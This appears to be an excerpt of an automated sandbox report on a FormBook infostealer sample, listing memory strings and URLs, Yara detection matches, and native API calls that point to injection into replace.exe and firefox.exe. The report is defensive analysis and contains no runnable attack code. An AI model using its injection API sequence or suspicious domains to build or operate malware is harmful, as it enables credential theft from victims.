                  Source: replace.exe, 00000006.00000002.4094316967.00000000042AA000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.00000000030FA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/hosting?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=hosting
                  Source: replace.exe, 00000006.00000002.4094316967.00000000042AA000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.00000000030FA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/partners?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=partners
                  Source: replace.exe, 00000006.00000002.4094316967.00000000042AA000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.00000000030FA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/servidores/cloud?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=cloud
                  Source: replace.exe, 00000006.00000002.4094316967.00000000042AA000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.00000000030FA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/servidores/dedicados?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=de
                  Source: replace.exe, 00000006.00000002.4094316967.00000000042AA000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.00000000030FA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/servidores/vps?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=vps
                  Source: replace.exe, 00000006.00000002.4094316967.00000000042AA000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.00000000030FA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/soluciones?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=solutions
                  Source: replace.exe, 00000006.00000002.4094316967.00000000042AA000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.00000000030FA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=arsys
                  Source: MR-239-1599-A.scr.exeString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                  Source: replace.exe, 00000006.00000003.2159480486.0000000007F48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: replace.exe, 00000006.00000003.2159480486.0000000007F48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-542MMSL
                  Source: replace.exe, 00000006.00000002.4094316967.0000000003DF4000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000006.00000002.4096081074.0000000006490000.00000004.00000800.00020000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000002C44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2262693951.000000003EEA4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/
                  Source: replace.exe, 00000006.00000002.4094316967.0000000003DF4000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000006.00000002.4096081074.0000000006490000.00000004.00000800.00020000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000002C44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2262693951.000000003EEA4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/domenai/
                  Source: replace.exe, 00000006.00000002.4094316967.0000000003DF4000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000006.00000002.4096081074.0000000006490000.00000004.00000800.00020000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000002C44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2262693951.000000003EEA4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/duomenu-centras/
                  Source: replace.exe, 00000006.00000002.4094316967.0000000003DF4000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000006.00000002.4096081074.0000000006490000.00000004.00000800.00020000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000002C44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2262693951.000000003EEA4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/el-pasto-filtras/
                  Source: replace.exe, 00000006.00000002.4094316967.0000000003DF4000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000006.00000002.4096081074.0000000006490000.00000004.00000800.00020000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000002C44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2262693951.000000003EEA4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/neribotas-svetainiu-talpinimas/
                  Source: replace.exe, 00000006.00000002.4094316967.0000000003DF4000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000006.00000002.4096081074.0000000006490000.00000004.00000800.00020000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000002C44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2262693951.000000003EEA4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/profesionalus-hostingas/
                  Source: replace.exe, 00000006.00000002.4094316967.0000000003DF4000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000006.00000002.4096081074.0000000006490000.00000004.00000800.00020000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000002C44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2262693951.000000003EEA4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/sertifikatai/
                  Source: replace.exe, 00000006.00000002.4094316967.0000000003DF4000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000006.00000002.4096081074.0000000006490000.00000004.00000800.00020000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000002C44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2262693951.000000003EEA4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/svetainiu-kurimo-irankis/
                  Source: replace.exe, 00000006.00000002.4094316967.0000000003DF4000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000006.00000002.4096081074.0000000006490000.00000004.00000800.00020000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000002C44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2262693951.000000003EEA4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/talpinimo-planai/
                  Source: replace.exe, 00000006.00000002.4094316967.0000000003DF4000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000006.00000002.4096081074.0000000006490000.00000004.00000800.00020000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000002C44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2262693951.000000003EEA4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/vps-serveriai/
                  Source: DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.valentinaetommaso.it/page-not-found-404/
                  Source: replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.webnode.com/it/?utm_source=text&amp;utm_medium=footer&amp;utm_content=wnd2&amp;utm_campa
                  Source: replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.webnode.it/?utm_source=text&utm_medium=footer&utm_content=wnd2&utm_campaign=signature
                  Source: replace.exe, 00000006.00000002.4094316967.000000000443C000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.000000000328C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://x3nadr4oqr3b20ld.app

                  E-Banking Fraud

                  barindex
                  Yara detected FormBook
                  Source: Yara matchFile source: 3.2.MR-239-1599-A.scr.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.MR-239-1599-A.scr.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000009.00000002.4094770900.0000000004C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.4093386507.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.1945723633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.4093292133.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.1946088682.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.1948359702.0000000003660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.4092996752.0000000004050000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 3.2.MR-239-1599-A.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 3.2.MR-239-1599-A.scr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 00000009.00000002.4094770900.0000000004C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 00000006.00000002.4093386507.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 00000003.00000002.1945723633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 00000006.00000002.4093292133.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 00000003.00000002.1946088682.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 00000003.00000002.1948359702.0000000003660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 00000005.00000002.4092996752.0000000004050000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0042B233 NtClose,3_2_0042B233
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01532B60 NtClose,LdrInitializeThunk,3_2_01532B60
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01532DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_01532DF0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01532C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_01532C70
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015335C0 NtCreateMutant,LdrInitializeThunk,3_2_015335C0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01534340 NtSetContextThread,3_2_01534340
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01534650 NtSuspendThread,3_2_01534650
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01532BF0 NtAllocateVirtualMemory,3_2_01532BF0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01532BE0 NtQueryValueKey,3_2_01532BE0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01532B80 NtQueryInformationFile,3_2_01532B80
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01532BA0 NtEnumerateValueKey,3_2_01532BA0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01532AD0 NtReadFile,3_2_01532AD0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01532AF0 NtWriteFile,3_2_01532AF0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01532AB0 NtWaitForSingleObject,3_2_01532AB0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01532D10 NtMapViewOfSection,3_2_01532D10
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01532D00 NtSetInformationFile,3_2_01532D00
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01532D30 NtUnmapViewOfSection,3_2_01532D30
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01532DD0 NtDelayExecution,3_2_01532DD0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01532DB0 NtEnumerateKey,3_2_01532DB0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01532C60 NtCreateKey,3_2_01532C60
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01532C00 NtQueryInformationProcess,3_2_01532C00
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01532CC0 NtQueryVirtualMemory,3_2_01532CC0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01532CF0 NtOpenProcess,3_2_01532CF0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01532CA0 NtQueryInformationToken,3_2_01532CA0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01532F60 NtCreateProcessEx,3_2_01532F60
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01532F30 NtCreateSection,3_2_01532F30
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01532FE0 NtCreateFile,3_2_01532FE0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01532F90 NtProtectVirtualMemory,3_2_01532F90
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01532FB0 NtResumeThread,3_2_01532FB0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01532FA0 NtQuerySection,3_2_01532FA0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01532E30 NtWriteVirtualMemory,3_2_01532E30
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01532EE0 NtQueueApcThread,3_2_01532EE0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01532E80 NtReadVirtualMemory,3_2_01532E80
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01532EA0 NtAdjustPrivilegesToken,3_2_01532EA0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01533010 NtOpenDirectoryObject,3_2_01533010
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01533090 NtSetValueKey,3_2_01533090
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015339B0 NtGetContextThread,3_2_015339B0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01533D70 NtOpenThread,3_2_01533D70
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01533D10 NtOpenProcessToken,3_2_01533D10
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03454340 NtSetContextThread,LdrInitializeThunk,6_2_03454340
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03454650 NtSuspendThread,LdrInitializeThunk,6_2_03454650
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03452B60 NtClose,LdrInitializeThunk,6_2_03452B60
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03452BE0 NtQueryValueKey,LdrInitializeThunk,6_2_03452BE0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03452BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_03452BF0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03452BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_03452BA0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03452AD0 NtReadFile,LdrInitializeThunk,6_2_03452AD0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03452AF0 NtWriteFile,LdrInitializeThunk,6_2_03452AF0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03452F30 NtCreateSection,LdrInitializeThunk,6_2_03452F30
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03452FE0 NtCreateFile,LdrInitializeThunk,6_2_03452FE0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03452FB0 NtResumeThread,LdrInitializeThunk,6_2_03452FB0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03452EE0 NtQueueApcThread,LdrInitializeThunk,6_2_03452EE0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03452E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_03452E80
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03452D10 NtMapViewOfSection,LdrInitializeThunk,6_2_03452D10
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03452D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_03452D30
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03452DD0 NtDelayExecution,LdrInitializeThunk,6_2_03452DD0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03452DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_03452DF0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03452C60 NtCreateKey,LdrInitializeThunk,6_2_03452C60
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03452C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_03452C70
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03452CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_03452CA0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034535C0 NtCreateMutant,LdrInitializeThunk,6_2_034535C0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034539B0 NtGetContextThread,LdrInitializeThunk,6_2_034539B0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03452B80 NtQueryInformationFile,6_2_03452B80
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03452AB0 NtWaitForSingleObject,6_2_03452AB0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03452F60 NtCreateProcessEx,6_2_03452F60
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03452F90 NtProtectVirtualMemory,6_2_03452F90
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03452FA0 NtQuerySection,6_2_03452FA0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03452E30 NtWriteVirtualMemory,6_2_03452E30
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03452EA0 NtAdjustPrivilegesToken,6_2_03452EA0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03452D00 NtSetInformationFile,6_2_03452D00
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03452DB0 NtEnumerateKey,6_2_03452DB0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03452C00 NtQueryInformationProcess,6_2_03452C00
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03452CC0 NtQueryVirtualMemory,6_2_03452CC0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03452CF0 NtOpenProcess,6_2_03452CF0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03453010 NtOpenDirectoryObject,6_2_03453010
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03453090 NtSetValueKey,6_2_03453090
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03453D70 NtOpenThread,6_2_03453D70
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03453D10 NtOpenProcessToken,6_2_03453D10
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_02C27AC0 NtCreateFile,6_2_02C27AC0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_02C27F00 NtAllocateVirtualMemory,6_2_02C27F00
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_02C27C20 NtReadFile,6_2_02C27C20
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_02C27DA0 NtClose,6_2_02C27DA0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_02C27D10 NtDeleteFile,6_2_02C27D10
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 0_2_02B0CB7C0_2_02B0CB7C
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 0_2_02B0F3F80_2_02B0F3F8
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 0_2_02B0F3EB0_2_02B0F3EB
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 0_2_052976300_2_05297630
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 0_2_052976230_2_05297623
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 0_2_0776AB600_2_0776AB60
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 0_2_07766A000_2_07766A00
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 0_2_077600400_2_07760040
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 0_2_077600070_2_07760007
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 0_2_0776C0B00_2_0776C0B0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 0_2_0786F7600_2_0786F760
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 0_2_0786C6D20_2_0786C6D2
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 0_2_0786C6E00_2_0786C6E0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_004011903_2_00401190
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_004032103_2_00403210
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_004023133_2_00402313
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_004023203_2_00402320
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_004025103_2_00402510
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0040FD1A3_2_0040FD1A
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0040FD233_2_0040FD23
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0042D6733_2_0042D673
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_004166C33_2_004166C3
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_004166BE3_2_004166BE
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0040FF433_2_0040FF43
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_004027503_2_00402750
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0040DFC33_2_0040DFC3
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015881583_2_01588158
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0159A1183_2_0159A118
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014F01003_2_014F0100
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015B81CC3_2_015B81CC
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015C01AA3_2_015C01AA
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015B41A23_2_015B41A2
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015920003_2_01592000
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015BA3523_2_015BA352
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0150E3F03_2_0150E3F0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015C03E63_2_015C03E6
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015A02743_2_015A0274
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015802C03_2_015802C0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015005353_2_01500535
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015C05913_2_015C0591
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015B24463_2_015B2446
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015A44203_2_015A4420
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015AE4F63_2_015AE4F6
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015247503_2_01524750
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015007703_2_01500770
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014FC7C03_2_014FC7C0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0151C6E03_2_0151C6E0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015169623_2_01516962
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015029A03_2_015029A0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015CA9A63_2_015CA9A6
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0150A8403_2_0150A840
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015028403_2_01502840
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152E8F03_2_0152E8F0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014E68B83_2_014E68B8
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015BAB403_2_015BAB40
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015B6BD73_2_015B6BD7
